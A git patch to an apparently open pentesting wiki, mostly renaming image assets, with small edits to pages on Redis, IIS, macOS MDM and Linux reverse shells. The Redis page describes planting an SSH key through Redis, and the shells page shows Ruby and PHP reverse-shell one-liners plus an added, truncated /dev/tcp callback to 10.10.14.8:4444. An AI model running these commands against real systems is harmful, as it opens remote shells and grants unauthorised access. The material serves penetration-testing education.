From 7aaa6bac6de8ca9557b3929e3dcaf0b366350a21 Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 2 Sep 2021 21:18:04 +0000 Subject: [PATCH] GitBook: [master] 5 pages and 12 assets modified --- ... => image (446) (1) (2) (2) (3) (3) (2) (1).png} | Bin ... => image (446) (1) (2) (2) (3) (3) (2) (2).png} | Bin ... => image (446) (1) (2) (2) (3) (3) (2) (3).png} | Bin .../{image (567).png => image (567) (1) (1).png} | Bin ... (1).png => image (567) (1) (2) (2) (2) (1).png} | Bin ... (2).png => image (567) (1) (2) (2) (2) (2).png} | Bin .../pcap-inspection/README.md | 2 +- .../macos-mdm/README.md | 2 +- pentesting/6379-pentesting-redis.md | 3 +-- .../iis-internet-information-services.md | 2 +- shells/shells/linux.md | 1 + 11 files changed, 5 insertions(+), 5 deletions(-) rename .gitbook/assets/{image (446) (1) (2) (2) (3) (3) (1).png => image (446) (1) (2) (2) (3) (3) (2) (1).png} (100%) rename .gitbook/assets/{image (446) (1) (2) (2) (3) (3) (3).png => image (446) (1) (2) (2) (3) (3) (2) (2).png} (100%) rename .gitbook/assets/{image (446) (1) (2) (2) (3) (3).png => image (446) (1) (2) (2) (3) (3) (2) (3).png} (100%) rename .gitbook/assets/{image (567).png => image (567) (1) (1).png} (100%) rename .gitbook/assets/{image (567) (1) (2) (2) (1).png => image (567) (1) (2) (2) (2) (1).png} (100%) rename .gitbook/assets/{image (567) (1) (2) (2).png => image (567) (1) (2) (2) (2) (2).png} (100%) diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (1).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1).png similarity index 100% rename from .gitbook/assets/image (446) (1) (2) (2) (3) (3) (1).png rename to .gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1).png diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (3).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2).png similarity index 100% rename from .gitbook/assets/image (446) (1) (2) (2) (3) (3) (3).png rename to .gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2).png diff --git a/.gitbook/assets/image (446) (1) (2) (2) (3) (3).png b/.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (3).png similarity index 100% rename from .gitbook/assets/image (446) (1) (2) (2) (3) (3).png rename to .gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (3).png diff --git a/.gitbook/assets/image (567).png b/.gitbook/assets/image (567) (1) (1).png similarity index 100% rename from .gitbook/assets/image (567).png rename to .gitbook/assets/image (567) (1) (1).png diff --git a/.gitbook/assets/image (567) (1) (2) (2) (1).png b/.gitbook/assets/image (567) (1) (2) (2) (2) (1).png similarity index 100% rename from .gitbook/assets/image (567) (1) (2) (2) (1).png rename to .gitbook/assets/image (567) (1) (2) (2) (2) (1).png diff --git a/.gitbook/assets/image (567) (1) (2) (2).png b/.gitbook/assets/image (567) (1) (2) (2) (2) (2).png similarity index 100% rename from .gitbook/assets/image (567) (1) (2) (2).png rename to .gitbook/assets/image (567) (1) (2) (2) (2) (2).png diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index a79ca3de..8d513964 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -58,7 +58,7 @@ This tool is also useful to get **other information analysed** from the packets You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **\(It works in Windows\)**. This is another useful tool that **analyse the packets** and sort the information in a useful way to **know what is happening inside**. -![](../../../.gitbook/assets/image%20%28567%29%20%281%29.png) +![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%281%29.png) ### [BruteShark](https://github.com/odedshimon/BruteShark) diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md index 2b55af29..c9e6907c 100644 --- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate \(from APNS\)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29.png) +![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29.png) ### Step 6: Profile Installation diff --git a/pentesting/6379-pentesting-redis.md b/pentesting/6379-pentesting-redis.md index 85515e1e..e7390cb9 100644 --- a/pentesting/6379-pentesting-redis.md +++ b/pentesting/6379-pentesting-redis.md @@ -129,8 +129,7 @@ OK ### SSH -Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. -In the output of **`config get dir`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it: +Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of **`config get dir`** you could find the **home** of the **redis user** \(usually _/var/lib/redis_ or _/home/redis/.ssh_\), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it: 1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`** 2. Write the public key to a file : **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`** diff --git a/pentesting/pentesting-web/iis-internet-information-services.md b/pentesting/pentesting-web/iis-internet-information-services.md index 7f8b1c7f..e03ad725 100644 --- a/pentesting/pentesting-web/iis-internet-information-services.md +++ b/pentesting/pentesting-web/iis-internet-information-services.md @@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](../../.gitbook/assets/image%20%28446%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29.png) +![](../../.gitbook/assets/image%20%28446%29%20%281%29%20%282%29%20%282%29%20%283%29%20%283%29%20%282%29.png) It means that the server **didn't receive the correct domain name** inside the Host header. In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/shells/shells/linux.md b/shells/shells/linux.md index c4dbb99d..c79c9146 100644 --- a/shells/shells/linux.md +++ b/shells/shells/linux.md @@ -103,6 +103,7 @@ ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c. ```bash php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' +/dev/tcp/10.10.14.8/4444 0>&1'"); ?> ``` ## Java